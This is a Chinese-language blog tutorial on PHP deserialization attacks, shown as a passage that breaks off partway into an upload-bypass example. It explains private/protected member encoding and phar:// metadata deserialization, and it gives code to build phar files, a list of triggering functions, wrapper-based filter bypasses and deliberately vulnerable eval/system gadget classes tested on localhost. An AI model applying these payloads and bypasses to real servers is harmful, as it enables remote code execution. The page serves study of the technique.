<!DOCTYPE html>






<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 3.9.0">
<script src="//cdn.bootcss.com/pace/1.0.2/pace.min.js"></script>
<link href="//cdn.bootcss.com/pace/1.0.2/themes/pink/pace-theme-flash.css" rel="stylesheet">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=7.4.1">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=7.4.1">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=7.4.1">
  <link rel="mask-icon" href="/images/logo.svg?v=7.4.1" color="#222">

<link rel="stylesheet" href="/css/main.css?v=7.4.1">


<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css?v=4.7.0">


<script id="hexo-configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '7.4.1',
    exturl: false,
    sidebar: {"position":"left","display":"post","offset":12,"onmobile":false},
    copycode: {"enable":false,"show_result":false,"style":null},
    back2top: {"enable":true,"sidebar":false,"scrollpercent":false},
    bookmark: {"enable":false,"color":"#222","save":"auto"},
    fancybox: false,
    mediumzoom: false,
    lazyload: false,
    pangu: false,
    algolia: {
      appID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    },
    localsearch: {"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},
    path: '',
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    translation: {
      copy_button: 'Copy',
      copy_success: 'Copied',
      copy_failure: 'Copy failed'
    },
    sidebarPadding: 40
  };
</script>

  <meta name="description" content="以前在做反序列化的题的时候遇到的都是public成员，先来复习一下一个简单的序列化例子：">
<meta property="og:type" content="article">
<meta property="og:title" content="php反序列化学习">
<meta property="og:url" content="http://yoursite.com/2019/10/16/php反序列化学习/index.html">
<meta property="og:site_name" content="su33er的博客">
<meta property="og:description" content="以前在做反序列化的题的时候遇到的都是public成员，先来复习一下一个简单的序列化例子：">
<meta property="og:locale" content="en">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190929223536-66d2d19c-e2c6-1.jpeg">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190929223546-6cae61bc-e2c6-1.jpeg">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190929223553-70a8c3a2-e2c6-1.jpeg">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190929223600-7538a04a-e2c6-1.jpeg">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20191003102307-bcf07c1c-e584-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20191003102308-bd478174-e584-1.jpg">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20191003102309-bdd64120-e584-1.jpg">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20191003102310-be6e25bc-e584-1.jpg">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20191003102313-c07d9e8c-e584-1.jpg">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190929223811-c32575ee-e2c6-1.jpeg">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190929223820-c89a06de-e2c6-1.jpeg">
<meta property="og:updated_time" content="2019-10-16T12:48:35.790Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="php反序列化学习">
<meta name="twitter:description" content="以前在做反序列化的题的时候遇到的都是public成员，先来复习一下一个简单的序列化例子：">
<meta name="twitter:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190929223536-66d2d19c-e2c6-1.jpeg">
  <link rel="canonical" href="http://yoursite.com/2019/10/16/php反序列化学习/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome: false,
    isPost: true,
    isPage: false,
    isArchive: false
  };
</script>

  <title>php反序列化学习 | su33er的博客</title>
  








  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

  
</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-meta">

    <div>
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">su33er的博客</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
  </div>

  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>
</div>


<nav class="site-nav">
  
  <ul id="menu" class="menu">
      
      
        
        
        <li class="menu-item menu-item-home">
      
    

    <a href="/" rel="section"><i class="fa fa-fw fa-home"></i>Home</a>

  </li>
      
    
      
      
        
        
        <li class="menu-item menu-item-categories">
      
    

    <a href="/categories/" rel="section"><i class="fa fa-fw fa-th"></i>Categories</a>

  </li>
      
    
      
      
        
        
        <li class="menu-item menu-item-archives">
      
    

    <a href="/archives/" rel="section"><i class="fa fa-fw fa-archive"></i>Archives</a>

  </li>
      
    
  </ul>

    

</nav>
</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
          <div class="content">
            

  <div class="posts-expand">
      
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block " lang="en">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2019/10/16/php反序列化学习/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="su33er">
      <meta itemprop="description" content="同志###我要向你学习!">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="su33er的博客">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          
            php反序列化学习
            

          
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              
                
              

              <time title="Created: 2019-10-16 19:54:41 / Modified: 20:48:35" itemprop="dateCreated datePublished" datetime="2019-10-16T19:54:41+08:00">2019-10-16</time>
            </span>
          
            

            
          

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>以前在做反序列化的题的时候遇到的都是public成员，<br>先来复习一下一个简单的序列化例子：</p>
<a id="more"></a>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">class Threezh1 &#123;</span><br><span class="line">    public $text;</span><br><span class="line"></span><br><span class="line">    function execute($payload) &#123;</span><br><span class="line">        eval($payload);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    function __destruct()&#123;</span><br><span class="line">        $this-&gt;execute($this-&gt;text);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$a = new Threezh1();</span><br><span class="line">$a-&gt;text = &apos;echo &quot;Threezh1&quot;;&apos;;</span><br><span class="line">echo serialize($a);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>序列化后的内容：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">O:8:&quot;Threezh1&quot;:1:&#123;s:4:&quot;text&quot;;s:16:&quot;echo &quot;Threezh1&quot;;&quot;;&#125;</span><br></pre></td></tr></table></figure>

<p>O代表这是一个对象，8代表对象名称的长度，1代表成员个数。</p>
<p>大括号中分别是：属性名类型、长度、名称;值类型、长度、值。</p>
<p>那反序列化的过程中是这样的：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">class Threezh1 &#123;</span><br><span class="line">    public $text;</span><br><span class="line"></span><br><span class="line">    function execute($payload) &#123;</span><br><span class="line">        eval($payload);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    function __destruct()&#123;</span><br><span class="line">        $this-&gt;execute($this-&gt;text);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">unserialize($_GET[&quot;a&quot;]);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>访问：[<a href="http://127.0.0.1/index.php?a=O:8:%22Threezh1%22:1:{s:4:%22text%22;s:16:%22echo%20%22Threezh1%22;%22;}]" target="_blank" rel="noopener">http://127.0.0.1/index.php?a=O:8:%22Threezh1%22:1:{s:4:%22text%22;s:16:%22echo%20%22Threezh1%22;%22;}]</a>(<a href="http://127.0.0.1/index.php?a=O:8:&quot;Threezh1&quot;:1:{s:4:&quot;text&quot;;s:16:&quot;echo" target="_blank" rel="noopener">http://127.0.0.1/index.php?a=O:8:&quot;Threezh1&quot;:1:{s:4:&quot;text&quot;;s:16:&quot;echo</a> “Threezh1”;”;})</p>
<p>返回：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Threezh1</span><br></pre></td></tr></table></figure>

<h3 id="Private类型"><a href="#Private类型" class="headerlink" title="Private类型"></a>Private类型</h3><p><strong>那么问题来了</strong>，如果把$text成员从public改为private呢？</p>
<p>因为在实例中无法通过$obj-&gt;属性名(或方法名) 来调用pravite类型的方法或属性。所以上面生成的例子需要改一下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">class Threezh1</span><br><span class="line">&#123;</span><br><span class="line">    private $text = &apos;phpinfo();&apos;;</span><br><span class="line"></span><br><span class="line">    public function setPayload($temp)&#123;</span><br><span class="line">        $this-&gt;text = $temp;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    function execute($payload) &#123;</span><br><span class="line">        eval($payload);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    function __destruct()&#123;</span><br><span class="line">        $this-&gt;execute($this-&gt;text);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$a = new Threezh1();</span><br><span class="line">$a-&gt;setPayload(&apos;echo &quot;Threezh1&quot;;&apos;);</span><br><span class="line">$data = serialize($a);</span><br><span class="line">echo($data);</span><br><span class="line">file_put_contents(&quot;serialize.txt&quot;, $data);</span><br></pre></td></tr></table></figure>

<p>这时候生成出来的序列化的内容为：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">O:8:&quot;Threezh1&quot;:1:&#123;s:14:&quot;Threezh1text&quot;;s:16:&quot;echo &quot;Threezh1&quot;;&quot;;&#125;</span><br></pre></td></tr></table></figure>

<p>按照前面的反序列化步骤，进行反序列化。会发现序列化并没有成功，显示了phpinfo的页面：</p>
<p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20190929223536-66d2d19c-e2c6-1.jpeg" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190929223536-66d2d19c-e2c6-1.jpeg" alt="img"></a></p>
<p>那怎么样才能使它反序列化成功呢？我们使用winhex打开刚刚保存的<code>serialize.txt</code>。内容如下图：</p>
<p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20190929223546-6cae61bc-e2c6-1.jpeg" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190929223546-6cae61bc-e2c6-1.jpeg" alt="img"></a></p>
<p>会发现在Threezh1的左右，也就是属性名中的类名左右存在两个空字节。所以反序列化不成功的原因就是由于序列化内容生成到网页后，空字节不会一同生成出去，导致反序列化的时候无法识别是private属性，反序列化失败。</p>
<p>那解决这个问题的方法就是，在传递反序列化字符串中，在类名的左右加上<code>%00</code>，也就是空字节对于的URL编码。反序列化成功结果如下：</p>
<p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20190929223553-70a8c3a2-e2c6-1.jpeg" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190929223553-70a8c3a2-e2c6-1.jpeg" alt="img"></a></p>
<p>这也正好解释了，为什么序列化内容中，为什么属性名的长度为14。</p>
<p>所以，Private类型在序列化的格式为：<code>%00类名%00</code></p>
<h3 id="Protected类型"><a href="#Protected类型" class="headerlink" title="Protected类型"></a>Protected类型</h3><p>Protected类型和private有些许不同，生成的序列化内容为：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">O:8:&quot;Threezh1&quot;:1:&#123;s:7:&quot;*text&quot;;s:16:&quot;echo &quot;Threezh1&quot;;&quot;;&#125;</span><br></pre></td></tr></table></figure>

<p>使用winhex查看保存的<code>serialize.txt</code>：</p>
<p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20190929223600-7538a04a-e2c6-1.jpeg" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190929223600-7538a04a-e2c6-1.jpeg" alt="img"></a></p>
<p>可得出，Protected类型在序列化的格式为：<code>%00*%00类名</code></p>
<h2 id="Phar反序列化"><a href="#Phar反序列化" class="headerlink" title="Phar反序列化"></a>Phar反序列化</h2><p>phar的总结类文章已经有很多了，比如Hu3sky学长的<a href="https://xz.aliyun.com/t/2715" target="_blank" rel="noopener">初探phar://</a></p>
<p>自己在总结phar的过程中又学习到了一些新的内容，这里就做下记录。</p>
<h3 id="phar文件的结构："><a href="#phar文件的结构：" class="headerlink" title="phar文件的结构："></a>phar文件的结构：</h3><p>phar文件都包含以下几个部分：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">1. stub</span><br><span class="line">    phar文件的标志，必须以 xxx __HALT_COMPILER();?&gt; 结尾，否则无法识别。xxx可以为自定义内容。</span><br><span class="line">2. manifest</span><br><span class="line">    phar文件本质上是一种压缩文件，其中每个被压缩文件的权限、属性等信息都放在这部分。这部分还会以序列化的形式存储用户自定义的meta-data，这是漏洞利用最核心的地方。</span><br><span class="line">3. content</span><br><span class="line">    被压缩文件的内容</span><br><span class="line">4. signature (可空)</span><br><span class="line">    签名，放在末尾。</span><br></pre></td></tr></table></figure>

<h3 id="生成一个phar文件："><a href="#生成一个phar文件：" class="headerlink" title="生成一个phar文件："></a>生成一个phar文件：</h3><p>php内置了一个phar类来处理相关操作。</p>
<p>注意：这里要将php.ini里面的<code>phar.readonly</code>选项设置为<code>Off</code>。<code>并把分号去掉。</code></p>
<p>(如果你在命令行运行PHP文件还是无法生成成功，请使用php -v查看php版本并在修改指定版本的php.ini。)</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">    class TestObject &#123;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    @unlink(&quot;phar.phar&quot;);</span><br><span class="line">    $phar = new Phar(&quot;phar.phar&quot;); //后缀名必须为phar</span><br><span class="line">    $phar-&gt;startBuffering();</span><br><span class="line">    $phar-&gt;setStub(&quot;&lt;?php __HALT_COMPILER(); ?&gt;&quot;); //设置stub</span><br><span class="line">    $o = new TestObject();</span><br><span class="line">    $phar-&gt;setMetadata($o); //将自定义的meta-data存入manifest</span><br><span class="line">    $phar-&gt;addFromString(&quot;test.txt&quot;, &quot;test&quot;); //添加要压缩的文件</span><br><span class="line">    //签名自动计算</span><br><span class="line">    $phar-&gt;stopBuffering();</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<h3 id="漏洞利用条件"><a href="#漏洞利用条件" class="headerlink" title="漏洞利用条件"></a>漏洞利用条件</h3><ol>
<li>phar文件要能够上传到服务器端。</li>
<li>要有可用的魔术方法作为“跳板”。</li>
<li>文件操作函数的参数可控，且<code>:</code>、<code>/</code>、<code>phar</code>等特殊字符没有被过滤。</li>
</ol>
<h3 id="phar受影响的文件操作函数："><a href="#phar受影响的文件操作函数：" class="headerlink" title="phar受影响的文件操作函数："></a>phar受影响的文件操作函数：</h3><p>知道创宇测试后受影响的函数列表：</p>
<p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20191003102307-bcf07c1c-e584-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20191003102307-bcf07c1c-e584-1.png" alt="img"></a></p>
<p>但实际并不止这一些。</p>
<p>参考zxc师傅的文章：<a href="https://blog.zsxsoft.com/post/38" target="_blank" rel="noopener">https://blog.zsxsoft.com/post/38</a></p>
<p>在跟踪了受影响函数的调用情况后发现，除了所有文件函数，只要是函数的实现过程直接或间接调用了<code>php_stream_open_wrapper</code>。都可能触发phar反序列化漏洞。</p>
<p>以下这些方式都可触发phar反序列化漏洞：</p>
<p>exif</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">exif_thumbnail</span><br><span class="line">exif_imagetype</span><br></pre></td></tr></table></figure>

<p>gd</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">imageloadfont</span><br><span class="line">imagecreatefrom***</span><br></pre></td></tr></table></figure>

<p>hash</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">hash_hmac_file</span><br><span class="line">hash_file</span><br><span class="line">hash_update_file</span><br><span class="line">md5_file</span><br><span class="line">sha1_file</span><br></pre></td></tr></table></figure>

<p>file / url</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">get_meta_tags</span><br><span class="line">get_headers</span><br></pre></td></tr></table></figure>

<p>standard</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">getimagesize</span><br><span class="line">getimagesizefromstring</span><br></pre></td></tr></table></figure>

<p>zip</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$zip = new ZipArchive();</span><br><span class="line">$res = $zip-&gt;open(&apos;c.zip&apos;);</span><br><span class="line">$zip-&gt;extractTo(&apos;phar://test.phar/test&apos;);</span><br></pre></td></tr></table></figure>

<p>Bzip / Gzip</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">当环境限制了phar不能出现在前面的字符里。可以使用compress.bzip2://和compress.zlib://绕过</span><br><span class="line"></span><br><span class="line">$z = &apos;compress.bzip2://phar:///home/sx/test.phar/test.txt&apos;;</span><br><span class="line">$z = &apos;compress.zlib://phar:///home/sx/test.phar/test.txt&apos;;</span><br></pre></td></tr></table></figure>

<p>配合其他协议：(<a href="https://www.xctf.org.cn/library/details/17e9b70557d94b168c3e5d1e7d4ce78f475de26d/" target="_blank" rel="noopener">SUCTF</a>)</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">当环境限制了phar不能出现在前面的字符里，还可以配合其他协议进行利用。</span><br><span class="line">php://filter/read=convert.base64-encode/resource=phar://phar.phar</span><br><span class="line"></span><br><span class="line">这次的ByteCTF也有这个点。使用的是：php://filter/resource=phar://phar.phar</span><br></pre></td></tr></table></figure>

<p>Postgres</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">    $pdo = new PDO(sprintf(&quot;pgsql:host=%s;dbname=%s;user=%s;password=%s&quot;, &quot;127.0.0.1&quot;, &quot;postgres&quot;, &quot;sx&quot;, &quot;123456&quot;));</span><br><span class="line">    @$pdo-&gt;pgsqlCopyFromFile(&apos;aa&apos;, &apos;phar://phar.phar/aa&apos;);</span><br><span class="line">?&gt;</span><br><span class="line">pgsqlCopyToFile和pg_trace同样也是能使用的，需要开启phar的写功能。</span><br></pre></td></tr></table></figure>

<p>Mysql</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">LOAD DATA LOCAL INFILE也会触发这个php_stream_open_wrapper</span><br><span class="line"></span><br><span class="line">配置一下mysqld:</span><br><span class="line"></span><br><span class="line">[mysqld]</span><br><span class="line">local-infile=1</span><br><span class="line">secure_file_priv=&quot;&quot;</span><br><span class="line">&lt;?php</span><br><span class="line">class A &#123;</span><br><span class="line">    public $s = &apos;&apos;;</span><br><span class="line">    public function __wakeup () &#123;</span><br><span class="line">        system($this-&gt;s);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">$m = mysqli_init();</span><br><span class="line">mysqli_options($m, MYSQLI_OPT_LOCAL_INFILE, true);</span><br><span class="line">$s = mysqli_real_connect($m, &apos;localhost&apos;, &apos;root&apos;, &apos;root&apos;, &apos;testtable&apos;, 3306);</span><br><span class="line">$p = mysqli_query($m, &apos;LOAD DATA LOCAL INFILE \&apos;phar://test.phar/test\&apos; INTO TABLE a  LINES TERMINATED BY \&apos;\r\n\&apos;  IGNORE 1 LINES;&apos;);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<h3 id="漏洞的利用实例："><a href="#漏洞的利用实例：" class="headerlink" title="漏洞的利用实例："></a>漏洞的利用实例：</h3><h4 id="一个简单的例子"><a href="#一个简单的例子" class="headerlink" title="一个简单的例子"></a>一个简单的例子</h4><p>phar.php</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">    class TestObject &#123;</span><br><span class="line">    &#125;</span><br><span class="line">    $phar = new Phar(&quot;phar.phar&quot;); //后缀名必须为phar</span><br><span class="line">    $phar-&gt;startBuffering();</span><br><span class="line">    $phar-&gt;setStub(&quot;&lt;?php __HALT_COMPILER(); ?&gt;&quot;); //设置stub</span><br><span class="line">    $o = new TestObject();</span><br><span class="line">    $o -&gt; name=&apos;Threezh1&apos;; //控制TestObject中的name变量为Threezh1</span><br><span class="line">    $phar-&gt;setMetadata($o); //将自定义的meta-data存入manifest</span><br><span class="line">    $phar-&gt;addFromString(&quot;test.txt&quot;, &quot;test&quot;); //添加要压缩的文件</span><br><span class="line">    //签名自动计算</span><br><span class="line">    $phar-&gt;stopBuffering();</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>index.php</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">class TestObject &#123;</span><br><span class="line">    public $name;</span><br><span class="line"></span><br><span class="line">    function __destruct()</span><br><span class="line">    &#123;</span><br><span class="line">        echo $this -&gt; name;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">if ($_GET[&quot;file&quot;])&#123;</span><br><span class="line">    file_exists($_GET[&quot;file&quot;]);</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>使用<code>php phar.php</code>生成<code>phar.phar</code>文件。</p>
<p>访问：<a href="http://127.0.0.1/index.php?file=phar://phar.phar" target="_blank" rel="noopener">http://127.0.0.1/index.php?file=phar://phar.phar</a></p>
<p>返回：Threezh1。 反序列化利用成功。</p>
<p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20191003102308-bd478174-e584-1.jpg" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20191003102308-bd478174-e584-1.jpg" alt="img"></a></p>
<h4 id="绕过文件格式限制"><a href="#绕过文件格式限制" class="headerlink" title="绕过文件格式限制"></a>绕过文件格式限制</h4><ul>
<li>上传html页面: upload.html</li>
<li>后端校验页面：upload.php</li>
<li>一个漏洞页面：index.php (存在file_exits(), eval()函数)</li>
<li>一个上传目录： upload_file/</li>
</ul>
<p>upload.html:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">&lt;!DOCTYPE html&gt;</span><br><span class="line">&lt;html&gt;</span><br><span class="line">&lt;head&gt;</span><br><span class="line">    &lt;title&gt;upload file&lt;/title&gt;</span><br><span class="line">&lt;/head&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line">&lt;form action=&quot;http://127.0.0.1/upload.php&quot; method=&quot;post&quot; enctype=&quot;multipart/form-data&quot;&gt;</span><br><span class="line">    &lt;input type=&quot;file&quot; name=&quot;file&quot; /&gt;</span><br><span class="line">    &lt;input type=&quot;submit&quot; name=&quot;Upload&quot; /&gt;</span><br><span class="line">&lt;/form&gt;</span><br><span class="line">&lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br></pre></td></tr></table></figure>

<p>upload.php</p>
<p>仅允许格式为gif的文件上传。上传成功的文件会存储到upload_file目录下。</p>
